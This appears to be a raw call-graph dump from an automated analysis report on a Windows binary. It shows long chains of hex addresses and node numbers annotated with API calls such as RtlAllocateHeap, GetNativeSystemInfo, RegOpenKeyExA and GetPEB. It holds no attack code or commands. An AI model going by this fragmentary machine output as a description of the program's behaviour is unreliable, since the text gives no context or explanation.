de8bbe 13821->14788 13824 db809c 13822->13824 13825 db5c10 6 API calls 13824->13825 13826 db80a3 13825->13826 13827 db5730 RtlAllocateHeap 13826->13827 13829 db80b2 13827->13829 13828->13445 13830 dc7a00 RtlAllocateHeap 13829->13830 13831 db80ed 13830->13831 13832 db5c10 6 API calls 13831->13832 13833 db80f4 13832->13833 13834 dc7a00 RtlAllocateHeap 13833->13834 13835 db810c 13834->13835 13836 db5c10 6 API calls 13835->13836 13837 db8113 13836->13837 13838 dc7a00 RtlAllocateHeap 13837->13838 13839 db8144 13838->13839 13840 db5c10 6 API calls 13839->13840 13841 db814b 13840->13841 13842 db5730 RtlAllocateHeap 13841->13842 13843 db815a 13842->13843 13844 dc7a00 RtlAllocateHeap 13843->13844 13845 db8195 13844->13845 13846 db5c10 6 API calls 13845->13846 13847 db819c 13846->13847 13848 dc7a00 RtlAllocateHeap 13847->13848 13849 db81b4 13848->13849 13850 db5c10 6 API calls 13849->13850 13851 db81bb 13850->13851 13852 dc7a00 RtlAllocateHeap 13851->13852 13853 db81ec 13852->13853 13854 db5c10 6 API calls 13853->13854 13855 db81f3 13854->13855 13856 db5730 RtlAllocateHeap 13855->13856 13857 db8202 13856->13857 13858 dc7a00 RtlAllocateHeap 13857->13858 13859 db823d 13858->13859 13860 db5c10 6 API calls 13859->13860 13861 db8244 13860->13861 13862 dc7a00 RtlAllocateHeap 13861->13862 13863 db825c 13862->13863 13864 db5c10 6 API calls 13863->13864 13865 db8263 13864->13865 13866 dc7a00 RtlAllocateHeap 13865->13866 13867 db8294 13866->13867 13868 db5c10 6 API calls 13867->13868 13869 db829b 13868->13869 13870 db5730 RtlAllocateHeap 13869->13870 13870->13828 13872 db45d4 13871->13872 13873 db4647 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13872->13873 13874 dc80c0 RtlAllocateHeap 13872->13874 13873->13450 13874->13873 13876 db83e5 __cftof 13875->13876 13877 dc7a00 RtlAllocateHeap 13876->13877 13880 db8403 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13876->13880 13878 db841c 13877->13878 13879 db5c10 6 API calls 13878->13879 13881 db8427 13879->13881 13880->13454 13882 dc7a00 RtlAllocateHeap 13881->13882 13883 db8449 13882->13883 13884 db5c10 6 API calls 13883->13884 13886 db8454 shared_ptr 13884->13886 13885 db8524 GetNativeSystemInfo 13885->13880 13886->13880 13886->13885 13890 dc7e01 13887->13890 13891 dc7e2c 13887->13891 13888 dc7f20 13889 dc9270 RtlAllocateHeap 13888->13889 13899 dc7e91 shared_ptr 13889->13899 13890->13519 13891->13888 13892 dc7f1b 13891->13892 13894 dc7e80 13891->13894 13895 dc7ea7 13891->13895 13893 db2480 RtlAllocateHeap 13892->13893 13893->13888 13894->13892 13896 dc7e8b 13894->13896 13897 dcd3e2 RtlAllocateHeap 13895->13897 13895->13899 13898 dcd3e2 RtlAllocateHeap 13896->13898 13897->13899 13898->13899 13899->13519 13901 dc777b 13900->13901 13911 dc7864 shared_ptr 13900->13911 13904 dc77ea 13901->13904 13905 dc7811 13901->13905 13910 dc77fb 13901->13910 13901->13911 13902 dc9270 RtlAllocateHeap 13903 dc78f6 13902->13903 13906 db2480 RtlAllocateHeap 13903->13906 13904->13903 13908 dcd3e2 RtlAllocateHeap 13904->13908 13909 dcd3e2 RtlAllocateHeap 13905->13909 13905->13910 13907 dc78fb 13906->13907 13908->13910 13909->13910 13910->13902 13910->13911 13911->13522 13913 dc8dc9 13912->13913 13914 dc8cc3 13912->13914 13915 dc9270 RtlAllocateHeap 13913->13915 13917 dc8d2f 13914->13917 13918 dc8d05 13914->13918 13916 dc8dce 13915->13916 13919 db2480 RtlAllocateHeap 13916->13919 13922 dcd3e2 RtlAllocateHeap 13917->13922 13923 dc8d16 shared_ptr 13917->13923 13918->13916 13920 dc8d10 13918->13920 13919->13923 13921 dcd3e2 RtlAllocateHeap 13920->13921 13921->13923 13922->13923 13923->13522 13925 dc8339 13924->13925 13926 dc834d 13925->13926 13927 dc8f40 RtlAllocateHeap 13925->13927 13926->13619 13927->13926 13929 dc8248 13928->13929 13930 dc8292 13928->13930 13929->13930 13931 dc8251 13929->13931 13932 dc82a1 13930->13932 13934 dc8f40 RtlAllocateHeap 13930->13934 13933 dc9280 RtlAllocateHeap 13931->13933 13932->13621 13935 dc825a 13933->13935 13934->13932 13935->13621 13937 dc80c0 RtlAllocateHeap 13936->13937 13938 db49f3 13937->13938 13939 dc80c0 RtlAllocateHeap 13938->13939 13940 db4a0c 13939->13940 14791 db4690 13940->14791 13942 db4a99 shared_ptr 13942->13676 13969 dc7f80 13943->13969 13945 db596b 13946 db59e0 13945->13946 13947 dc7f80 RtlAllocateHeap 13946->13947 13960 db5a45 13947->13960 13948 dc7a00 RtlAllocateHeap 13948->13960 13949 db5c09 13951 dc8200 RtlAllocateHeap 13949->13951 13950 db5bdd __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13950->13691 13953 db5c0e 13951->13953 13952 dc80c0 RtlAllocateHeap 13952->13960 13954 db5940 RtlAllocateHeap 13953->13954 13956 db5c54 13954->13956 13957 db59e0 6 API calls 13956->13957 13958 db5c6a 13957->13958 13959 db4b30 6 API calls 13958->13959 13961 db5c7b shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13959->13961 13960->13948 13960->13949 13960->13950 13960->13952 13982 db5730 13960->13982 13961->13691 13963 db4dc2 13962->13963 13967 db4b92 13962->13967 13963->13693 13965 db4ce5 13965->13963 13966 dc8ca0 RtlAllocateHeap 13965->13966 13966->13965 13967->13965 13968 dc8ca0 RtlAllocateHeap 13967->13968 13988 de6da6 13967->13988 13968->13967 13970 dc7f9e __cftof 13969->13970 13972 dc7fc7 13969->13972 13970->13945 13971 dc9270 RtlAllocateHeap 13973 dc80b8 13971->13973 13974 dc803e 13972->13974 13975 dc801b 13972->13975 13980 dc802c __cftof 13972->13980 13976 db2480 RtlAllocateHeap 13973->13976 13979 dcd3e2 RtlAllocateHeap 13974->13979 13974->13980 13975->13973 13978 dcd3e2 RtlAllocateHeap 13975->13978 13977 dc80bd 13976->13977 13978->13980 13979->13980 13980->13971 13981 dc8095 shared_ptr 13980->13981 13981->13945 13986 db5860 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13982->13986 13987 db5799 shared_ptr 13982->13987 13983 db592a 13985 dc8200 RtlAllocateHeap 13983->13985 13984 dc80c0 RtlAllocateHeap 13984->13987 13985->13986 13986->13960 13987->13983 13987->13984 13987->13986 13989 de6db4 13988->13989 13990 de6dc2 __fassign 13988->13990 13993 de6d19 13989->13993 13990->13967 13994 de690a __fassign 5 API calls 13993->13994 13995 de6d2c 13994->13995 13998 de6d52 13995->13998 13997 de6d3d 13997->13967 13999 de6d8f 13998->13999 14002 de6d5f 13998->14002 14009 deb67d 13999->14009 14001 de6d6e __fassign 14001->13997 14002->14001 14004 deb6a1 14002->14004 14005 de690a __fassign 5 API calls 14004->14005 14006 deb6be 14005->14006 14008 deb6ce __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14006->14008 14013 def1bf 14006->14013 14008->14001 14010 deb688 14009->14010 14011 deb5fb __fassign 4 API calls 14010->14011 14012 deb698 14011->14012 14012->14001 14014 de690a __fassign 5 API calls 14013->14014 14015 def1df __fassign 14014->14015 14016 deb04b __fassign RtlAllocateHeap 14015->14016 14017 def232 __cftof __fassign __freea __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14015->14017 14016->14017 14017->14008 14019 de887a 14018->14019 14020 de690a __fassign 5 API calls 14019->14020 14023 de888f __dosmaperr ___std_exception_copy 14019->14023 14022 de88bf 14020->14022 14021 de6d52 5 API calls 14021->14022 14022->14021 14022->14023 14023->13732 14025 dc9294 14024->14025 14028 dc92a5 14025->14028 14142 dc94e0 14025->14142 14027 dc932b 14027->13752 14028->13752 14030 dc367f 14029->14030 14034 dc3e6f shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14029->14034 14031 dc80c0 RtlAllocateHeap 14030->14031 14032 dc36b0 14031->14032 14033 dc4327 14032->14033 14036 dc80c0 RtlAllocateHeap 14032->14036 14035 dc8200 RtlAllocateHeap 14033->14035 14034->13752 14037 dc432c 14035->14037 14038 dc36ff 14036->14038 14039 dc8200 RtlAllocateHeap 14037->14039 14038->14033 14040 dc80c0 RtlAllocateHeap 14038->14040 14044 dc4331 14039->14044 14041 dc3743 14040->14041 14041->14033 14042 dc3765 14041->14042 14043 dc80c0 RtlAllocateHeap 14042->14043 14045 dc3785 14043->14045 14047 dc8200 RtlAllocateHeap 14044->14047 14046 dc7a00 RtlAllocateHeap 14045->14046 14048 dc3798 14046->14048 14050 dc4340 14047->14050 14049 db5c10 6 API calls 14048->14049 14052 dc37a3 14049->14052 14450 dcc199 14050->14450 14052->14037 14053 dc37ef 14052->14053 14054 dc80c0 RtlAllocateHeap 14053->14054 14057 dc3811 shared_ptr 14054->14057 14055 dcc1d9 RtlAllocateHeap 14055->14034 14056 db98f0 6 API calls 14058 dc3872 14056->14058 14057->14044 14057->14056 14059 dc7a00 RtlAllocateHeap 14058->14059 14064 dc3c79 shared_ptr 14058->14064 14060 dc3889 14059->14060 14061 db5c10 6 API calls 14060->14061 14062 dc3894 14061->14062 14063 dc80c0 RtlAllocateHeap 14062->14063 14065 dc38dc shared_ptr 14063->14065 14064->14034 14064->14055 14065->14044 14066 dc39bd 14065->14066 14104 dc3ab7 shared_ptr __dosmaperr 14065->14104 14067 dc80c0 RtlAllocateHeap 14066->14067 14069 dc39da 14067->14069 14068 de8ab6 5 API calls 14071 dc3b7a 14068->14071 14154 dbad70 14069->14154 14071->14050 14072 dc3b89 14071->14072 14072->14064 14074 dc3c8d 14072->14074 14075 dc3e74 14072->14075 14076 dc3ba2 14072->14076 14077 dc3f42 14072->14077 14073 dc7a00 RtlAllocateHeap 14078 dc3a96 14073->14078 14080 dc80c0 RtlAllocateHeap 14074->14080 14079 dc80c0 RtlAllocateHeap 14075->14079 14082 dc80c0 RtlAllocateHeap 14076->14082 14081 dc7a00 RtlAllocateHeap 14077->14081 14084 dc7a00 RtlAllocateHeap 14078->14084 14085 dc3e9c 14079->14085 14086 dc3cb5 14080->14086 14087 dc3f56 14081->14087 14088 dc3bca 14082->14088 14083 dc39e5 shared_ptr 14083->14050 14083->14073 14089 dc3aa8 14084->14089 14090 dc7a00 RtlAllocateHeap 14085->14090 14091 dc7a00 RtlAllocateHeap 14086->14091 14092 dc7a00 RtlAllocateHeap 14087->14092 14093 dc7a00 RtlAllocateHeap 14088->14093 14094 db49a0 RtlAllocateHeap 14089->14094 14095 dc3eba 14090->14095 14096 dc3cd3 14091->14096 14097 dc3f6e 14092->14097 14098 dc3be8 14093->14098 14094->14104 14100 db5c10 6 API calls 14095->14100 14101 db5c10 6 API calls 14096->14101 14102 dc7a00 RtlAllocateHeap 14097->14102 14099 db5c10 6 API calls 14098->14099 14103 dc3bef 14099->14103 14105 dc3ec1 14100->14105 14106 dc3cda 14101->14106 14107 dc3f86 14102->14107 14108 dc7a00 RtlAllocateHeap 14103->14108 14104->14050 14104->14068 14109 dc7a00 RtlAllocateHeap 14105->14109 14110 dc7a00 RtlAllocateHeap 14106->14110 14111 dc7a00 RtlAllocateHeap 14107->14111 14112 dc3c07 14108->14112 14113 dc3ed9 14109->14113 14114 dc3cef 14110->14114 14115 dc3f98 14111->14115 14116 dc7a00 RtlAllocateHeap 14112->14116 14117 dc7a00 RtlAllocateHeap 14113->14117 14118 dc7a00 RtlAllocateHeap 14114->14118 14323 dc2f10 14115->14323 14120 dc3c1f 14116->14120 14121 dc3ef1 14117->14121 14122 dc3d07 14118->14122 14123 dc7a00 RtlAllocateHeap 14120->14123 14124 dc7a00 RtlAllocateHeap 14121->14124 14125 dc7a00 RtlAllocateHeap 14122->14125 14126 dc3c37 14123->14126 14127 dc3f09 14124->14127 14128 dc3d1f 14125->14128 14129 dc7a00 RtlAllocateHeap 14126->14129 14130 dc7a00 RtlAllocateHeap 14127->14130 14131 dc7a00 RtlAllocateHeap 14128->14131 14132 dc3c4f 14129->14132 14133 dc3f21 14130->14133 14134 dc3d37 14131->14134 14136 dc7a00 RtlAllocateHeap 14132->14136 14137 dc7a00 RtlAllocateHeap 14133->14137 14135 dc7a00 RtlAllocateHeap 14134->14135 14139 dc3d49 14135->14139 14138 dc3c67 14136->14138 14137->14138 14141 dc7a00 RtlAllocateHeap 14138->14141 14165 dc1ec0 14139->14165 14141->14064 14143 dc9619 14142->14143 14144 dc950b 14142->14144 14145 dc9270 RtlAllocateHeap 14143->14145 14148 dc9579 14144->14148 14149 dc9552 14144->14149 14146 dc961e 14145->14146 14147 db2480 RtlAllocateHeap 14146->14147 14153 dc9563 shared_ptr 14147->14153 14152 dcd3e2 RtlAllocateHeap 14148->14152 14148->14153 14149->14146 14150 dc955d 14149->14150 14151 dcd3e2 RtlAllocateHeap 14150->14151 14151->14153 14152->14153 14153->14027 14156 dbaec0 14154->14156 14155 dbaee6 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14155->14083 14156->14155 14157 db45b0 RtlAllocateHeap 14156->14157 14158 dbafab __cftof 14157->14158 14453 db55f0 14158->14453 14160 dbb04e 14161 dc80c0 RtlAllocateHeap 14160->14161 14162 dbb08b 14161->14162 14163 dc8200 RtlAllocateHeap 14162->14163 14164 dbb18c 14163->14164 14166 dc80c0 RtlAllocateHeap 14165->14166 14167 dc1f5b 14166->14167 14168 dc1fd8 14167->14168 14169 dc1f68 14167->14169 14170 dc80c0 RtlAllocateHeap 14168->14170 14171 dc7a00 RtlAllocateHeap 14169->14171 14176 dc2017 shared_ptr 14170->14176 14172 dc1f82 14171->14172 14173 db5c10 6 API calls 14172->14173 14174 dc1f89 14173->14174 14175 dc7a00 RtlAllocateHeap 14174->14175 14178 dc1f9f 14175->14178 14177 dc2131 14176->14177 14180 dc20af 14176->14180 14181 dc2ec5 14176->14181 14209 dc2a26 shared_ptr 14176->14209 14179 dc7a00 RtlAllocateHeap 14177->14179 14182 dc7a00 RtlAllocateHeap 14178->14182 14184 dc2140 14179->14184 14185 dc80c0 RtlAllocateHeap 14180->14185 14183 dc8200 RtlAllocateHeap 14181->14183 14186 dc1fb7 14182->14186 14187 dc2eca 14183->14187 14188 db5c10 6 API calls 14184->14188 14196 dc20d3 shared_ptr 14185->14196 14189 dc7a00 RtlAllocateHeap 14186->14189 14191 dc8200 RtlAllocateHeap 14187->14191 14199 dc214b 14188->14199 14192 dc1fcf 14189->14192 14190 dcc199 std::_Xinvalid_argument RtlAllocateHeap 14193 dc2ef2 14190->14193 14201 dc2ecf 14191->14201 14195 dc7a00 RtlAllocateHeap 14192->14195 14197 dcc1d9 RtlAllocateHeap 14193->14197 14194 dc80c0 RtlAllocateHeap 14194->14177 14198 dc2bec 14195->14198 14196->14194 14196->14209 14200 dbe530 13 API calls 14198->14200 14199->14187 14202 dc21a2 14199->14202 14200->14209 14204 dcc199 std::_Xinvalid_argument RtlAllocateHeap 14201->14204 14203 dc80c0 RtlAllocateHeap 14202->14203 14206 dc21c7 shared_ptr 14203->14206 14204->14209 14205 dc7a00 RtlAllocateHeap 14207 dc2232 14205->14207 14206->14201 14206->14205 14208 db5c10 6 API calls 14207->14208 14210 dc223d 14208->14210 14209->14190 14212 dc2ea0 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14209->14212 14211 dc80c0 RtlAllocateHeap 14210->14211 14213 dc22a4 shared_ptr __dosmaperr 14211->14213 14212->14064 14213->14201 14214 de8ab6 5 API calls 14213->14214 14215 dc2355 14214->14215 14215->14201 14216 dc2364 14215->14216 14216->14193 14218 dc237d 14216->14218 14219 dc24aa 14216->14219 14220 dc265b 14216->14220 14221 dc25a7 14216->14221 14264 dc23d2 shared_ptr 14216->14264 14217 dc7a00 RtlAllocateHeap 14222 dc2730 14217->14222 14223 dc7a00 RtlAllocateHeap 14218->14223 14224 dc7a00 RtlAllocateHeap 14219->14224 14225 dc7a00 RtlAllocateHeap 14220->14225 14226 dc7a00 RtlAllocateHeap 14221->14226 14228 dc7a00 RtlAllocateHeap 14222->14228 14229 dc2394 14223->14229 14230 dc24c1 14224->14230 14231 dc2672 14225->14231 14227 dc25be 14226->14227 14233 dc7a00 RtlAllocateHeap 14227->14233 14234 dc2742 14228->14234 14235 dc7a00 RtlAllocateHeap 14229->14235 14236 dc7a00 RtlAllocateHeap 14230->14236 14232 dc7a00 RtlAllocateHeap 14231->14232 14237 dc268a 14232->14237 14238 dc25d6 14233->14238 14510 de6729 14234->14510 14239 dc23ac 14235->14239 14240 dc24d9 14236->14240 14242 dc7a00 RtlAllocateHeap 14237->14242 14243 dc7a00 RtlAllocateHeap 14238->14243 14244 dc7a00 RtlAllocateHeap 14239->14244 14241 dc7a00 RtlAllocateHeap 14240->14241 14256 dc24f1 14241->14256 14245 dc26a2 14242->14245 14246 dc25ee 14243->14246 14248 dc23c4 14244->14248 14500 db8eb0 14245->14500 14490 db9030 14246->14490 14480 db8d30 14248->14480 14253 dc2b73 14254 dc7a00 RtlAllocateHeap 14253->14254 14257 dc2b8d 14254->14257 14259 dc80c0 RtlAllocateHeap 14256->14259 14260 db5c10 6 API calls 14257->14260 14258 dc277b 14261 dc7a00 RtlAllocateHeap 14258->14261 14259->14264 14262 dc2b94 14260->14262 14267 dc2790 shared_ptr __dosmaperr 14261->14267 14263 dc7a00 RtlAllocateHeap 14262->14263 14265 dc2baa 14263->14265 14264->14209 14264->14217 14266 dc7a00 RtlAllocateHeap 14265->14266 14268 dc2bc2 14266->14268 14267->14209 14270 de8ab6 5 API calls 14267->14270 14269 dc7a00 RtlAllocateHeap 14268->14269 14269->14192 14271 dc2849 14270->14271 14271->14193 14271->14209 14271->14253 14272 dc2871 14271->14272 14273 dc7a00 RtlAllocateHeap 14272->14273 14274 dc2888 14273->14274 14275 dc7a00 RtlAllocateHeap 14274->14275 14276 dc289d 14275->14276 14517 db77b0 14276->14517 14278 dc28a6 14279 dc2b16 14278->14279 14280 dc28c1 14278->14280 14282 dc7a00 RtlAllocateHeap 14279->14282 14281 dc7a00 RtlAllocateHeap 14280->14281 14283 dc28cb 14281->14283 14284 dc2b20 14282->14284 14285 db5c10 6 API calls 14283->14285 14286 db5c10 6 API calls 14284->14286 14287 dc28d2 14285->14287 14288 dc2b27 14286->14288 14289 dc7a00 RtlAllocateHeap 14287->14289 14290 dc7a00 RtlAllocateHeap 14288->14290 14291 dc28e8 14289->14291 14292 dc2b3d 14290->14292 14294 dc7a00 RtlAllocateHeap 14291->14294 14293 dc7a00 RtlAllocateHeap 14292->14293 14295 dc2b55 14293->14295 14296 dc2900 14294->14296 14297 dc7a00 RtlAllocateHeap 14295->14297 14298 dc7a00 RtlAllocateHeap 14296->14298 14297->14192 14299 dc2918 14298->14299 14300 dc7a00 RtlAllocateHeap 14299->14300 14301 dc292a 14300->14301 14530 dbe530 14301->14530 14303 dc2933 14303->14209 14304 dc7a00 RtlAllocateHeap 14303->14304 14305 dc2994 14304->14305 14306 db5c10 6 API calls 14305->14306 14307 dc299f 14306->14307 14308 dc8320 RtlAllocateHeap 14307->14308 14309 dc29b3 14308->14309 14666 dc85e0 14309->14666 14311 dc29c7 14312 dc8320 RtlAllocateHeap 14311->14312 14313 dc29d7 14312->14313 14314 dc7a00 RtlAllocateHeap 14313->14314 14315 dc29f7 14314->14315 14670 db8980 14315->14670 14317 dc29fe 14318 dc7a00 RtlAllocateHeap 14317->14318 14319 dc2a13 14318->14319 14320 db5c10 6 API calls 14319->14320 14321 dc2a1a 14320->14321 14678 db5ee0 RegOpenKeyExA 14321->14678 14324 dc2f54 14323->14324 14325 dc7a00 RtlAllocateHeap 14324->14325 14326 dc2f68 14325->14326 14327 db5c10 6 API calls 14326->14327 14328 dc2f6f 14327->14328 14329 dc7a00 RtlAllocateHeap 14328->14329 14330 dc2f82 14329->14330 14331 dc7a00 RtlAllocateHeap 14330->14331 14332 dc2f97 14331->14332 14333 dc7a00 RtlAllocateHeap 14332->14333 14334 dc2fac 14333->14334 14335 dc7a00 RtlAllocateHeap 14334->14335 14336 dc350a 14335->14336 14337 dbe530 13 API calls 14336->14337 14338 dc3513 shared_ptr 14337->14338 14339 dc80c0 RtlAllocateHeap 14338->14339 14342 dc360a shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14338->14342 14340 dc36b0 14339->14340 14341 dc4327 14340->14341 14344 dc80c0 RtlAllocateHeap 14340->14344 14343 dc8200 RtlAllocateHeap 14341->14343 14342->14064 14345 dc432c 14343->14345 14346 dc36ff 14344->14346 14347 dc8200 RtlAllocateHeap 14345->14347 14346->14341 14348 dc80c0 RtlAllocateHeap 14346->14348 14352 dc4331 14347->14352 14349 dc3743 14348->14349 14349->14341 14350 dc3765 14349->14350 14351 dc80c0 RtlAllocateHeap 14350->14351 14353 dc3785 14351->14353 14355 dc8200 RtlAllocateHeap 14352->14355 14354 dc7a00 RtlAllocateHeap 14353->14354 14356 dc3798 14354->14356 14358 dc4340 14355->14358 14357 db5c10 6 API calls 14356->14357 14360 dc37a3 14357->14360 14359 dcc199 std::_Xinvalid_argument RtlAllocateHeap 14358->14359 14371 dc3c79 shared_ptr 14359->14371 14360->14345 14361 dc37ef 14360->14361 14362 dc80c0 RtlAllocateHeap 14361->14362 14365 dc3811 shared_ptr 14362->14365 14363 dcc1d9 RtlAllocateHeap 14363->14342 14364 db98f0 6 API calls 14366 dc3872 14364->14366 14365->14352 14365->14364 14367 dc7a00 RtlAllocateHeap 14366->14367 14366->14371 14368 dc3889 14367->14368 14369 db5c10 6 API calls 14368->14369 14370 dc3894 14369->14370 14372 dc80c0 RtlAllocateHeap 14370->14372 14371->14342 14371->14363 14373 dc38dc shared_ptr 14372->14373 14373->14352 14374 dc39bd 14373->14374 14425 dc3ab7 shared_ptr __dosmaperr 14373->14425 14375 dc80c0 RtlAllocateHeap 14374->14375 14377 dc39da 14375->14377 14376 de8ab6 5 API calls 14379 dc3b7a 14376->14379 14378 dbad70 6 API calls 14377->14378 14391 dc39e5 shared_ptr 14378->14391 14379->14358 14380 dc3b89 14379->14380 14380->14371 14382 dc3c8d 14380->14382 14383 dc3e74 14380->14383 14384 dc3ba2 14380->14384 14385 dc3f42 14380->14385 14381 dc7a00 RtlAllocateHeap 14386 dc3a96 14381->14386 14388 dc80c0 RtlAllocateHeap 14382->14388 14387 dc80c0 RtlAllocateHeap 14383->14387 14390 dc80c0 RtlAllocateHeap 14384->14390 14389 dc7a00 RtlAllocateHeap 14385->14389 14392 dc7a00 RtlAllocateHeap 14386->14392 14393 dc3e9c 14387->14393 14394 dc3cb5 14388->14394 14395 dc3f56 14389->14395 14396 dc3bca 14390->14396 14391->14358 14391->14381 14397 dc3aa8 14392->14397 14398 dc7a00 RtlAllocateHeap 14393->14398 14399 dc7a00 RtlAllocateHeap 14394->14399 14400 dc7a00 RtlAllocateHeap 14395->14400 14401 dc7a00 RtlAllocateHeap 14396->14401 14402 db49a0 RtlAllocateHeap 14397->14402 14403 dc3eba 14398->14403 14404 dc3cd3 14399->14404 14405 dc3f6e 14400->14405 14406 dc3be8 14401->14406 14402->14425 14408 db5c10 6 API calls 14403->14408 14409 db5c10 6 API calls 14404->14409 14410 dc7a00 RtlAllocateHeap 14405->14410 14407 db5c10 6 API calls 14406->14407 14411 dc3bef 14407->14411 14412 dc3ec1 14408->14412 14413 dc3cda 14409->14413 14414 dc3f86 14410->14414 14415 dc7a00 RtlAllocateHeap 14411->14415 14416 dc7a00 RtlAllocateHeap 14412->14416 14417 dc7a00 RtlAllocateHeap 14413->14417 14418 dc7a00 RtlAllocateHeap 14414->14418 14419 dc3c07 14415->14419 14420 dc3ed9 14416->14420 14421 dc3cef 14417->14421 14422 dc3f98 14418->14422 14423 dc7a00 RtlAllocateHeap 14419->14423 14424 dc7a00 RtlAllocateHeap 14420->14424 14426 dc7a00 RtlAllocateHeap 14421->14426 14427 dc2f10 16 API calls 14422->14427 14428 dc3c1f 14423->14428 14429 dc3ef1 14424->14429 14425->14358 14425->14376 14430 dc3d07 14426->14430 14427->14371 14431 dc7a00 RtlAllocateHeap 14428->14431 14432 dc7a00 RtlAllocateHeap 14429->14432 14433 dc7a00 RtlAllocateHeap 14430->14433 14434 dc3c37 14431->14434 14435 dc3f09 14432->14435 14436 dc3d1f 14433->14436 14437 dc7a00 RtlAllocateHeap 14434->14437 14438 dc7a00 RtlAllocateHeap 14435->14438 14439 dc7a00 RtlAllocateHeap 14436->14439 14440 dc3c4f 14437->14440 14441 dc3f21 14438->14441 14442 dc3d37 14439->14442 14444 dc7a00 RtlAllocateHeap 14440->14444 14445 dc7a00 RtlAllocateHeap 14441->14445 14443 dc7a00 RtlAllocateHeap 14442->14443 14447 dc3d49 14443->14447 14446 dc3c67 14444->14446 14445->14446 14449 dc7a00 RtlAllocateHeap 14446->14449 14448 dc1ec0 16 API calls 14447->14448 14448->14371 14449->14371 14782 dcc0e9 14450->14782 14452 dcc1aa std::_Xinvalid_argument 14454 db5610 14453->14454 14456 db5710 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14454->14456 14457 db22c0 14454->14457 14456->14160 14460 db2280 14457->14460 14461 db2296 14460->14461 14464 de87f8 14461->14464 14467 de7609 14464->14467 14466 db22a4 14466->14454 14468 de7649 14467->14468 14470 de7631 __dosmaperr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z ___std_exception_copy 14467->14470 14469 de690a __fassign 5 API calls 14468->14469 14468->14470 14471 de7661 14469->14471 14470->14466 14473 de7bc4 14471->14473 14475 de7bd5 14473->14475 14474 de7be4 __dosmaperr ___std_exception_copy 14474->14470 14475->14474 14476 de8168 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 14475->14476 14477 de7dc2 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 14475->14477 14478 de7de8 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 14475->14478 14479 de7f36 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 14475->14479 14476->14475 14477->14475 14478->14475 14479->14475 14481 db8d7f 14480->14481 14482 dc7a00 RtlAllocateHeap 14481->14482 14483 db8d8f 14482->14483 14484 db5c10 6 API calls 14483->14484 14485 db8d9a 14484->14485 14486 dc80c0 RtlAllocateHeap 14485->14486 14487 db8dec 14486->14487 14488 dc8220 RtlAllocateHeap 14487->14488 14489 db8dfe shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14488->14489 14489->14264 14491 db9080 14490->14491 14492 dc7a00 RtlAllocateHeap 14491->14492 14493 db908f 14492->14493 14494 db5c10 6 API calls 14493->14494 14495 db909a 14494->14495 14496 dc80c0 RtlAllocateHeap 14495->14496 14497 db90ec 14496->14497 14498 dc8220 RtlAllocateHeap 14497->14498 14499 db90fe shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14498->14499 14499->14264 14501 db8eff 14500->14501 14502 dc7a00 RtlAllocateHeap 14501->14502 14503 db8f0f 14502->14503 14504 db5c10 6 API calls 14503->14504 14505 db8f1a 14504->14505 14506 dc80c0 RtlAllocateHeap 14505->14506 14507 db8f6c 14506->14507 14508 dc8220 RtlAllocateHeap 14507->14508 14509 db8f7e shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14508->14509 14509->14264 14696 de6672 14510->14696 14512 dc276a 14512->14253 14513 de67b7 14512->14513 14515 de67c3 __fassign 14513->14515 14514 de67cd __dosmaperr ___std_exception_copy 14514->14258 14515->14514 14712 de6740 14515->14712 14735 dc8680 14517->14735 14519 db77f1 14520 dc8320 RtlAllocateHeap 14519->14520 14522 db7803 shared_ptr 14520->14522 14521 dc7a00 RtlAllocateHeap 14523 db7861 14521->14523 14522->14521 14529 db78a6 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 14522->14529 14524 dc7a00 RtlAllocateHeap 14523->14524 14525 db787c 14524->14525 14526 db5c10 6 API calls 14525->14526 14527 db7883 14526->14527 14528 dc80c0 RtlAllocateHeap 14527->14528 14528->14529 14529->14278 14531 dc7a00 RtlAllocateHeap 14530->14531 14532 dbe576 14531->14532 14533 db5c10 6 API calls 14532->14533 14534 dbe581 14533->14534 14535 dc7a00 RtlAllocateHeap 14534->14535 14536 dbe59c 14535->14536 14537 db5c10 6 API calls 14536->14537 14538 dbe5a7 14537->14538 14539 dc9280 RtlAllocateHeap 14538->14539 14540 dbe5ba 14539->14540 14541 dc8320 RtlAllocateHeap 14540->14541 14542 dbe5fc 14541->14542 14543 dc8220 RtlAllocateHeap 14542->14543 14544 dbe60d 14543->14544 14545 dc8320 RtlAllocateHeap 14544->14545 14546 dbe61e 14545->14546 14547 dc7a00 RtlAllocateHeap 14546->14547 14548 dbe7cb 14547->14548 14549 dc7a00 RtlAllocateHeap 14548->14549 14550 dbe7e0 14549->14550 14551 dc7a00 RtlAllocateHeap 14550->14551 14552 dbe7f2 14551->14552 14553 dbbe30 12 API calls 14552->14553 14554 dbe7fe 14553->14554 14555 dc7a00 RtlAllocateHeap 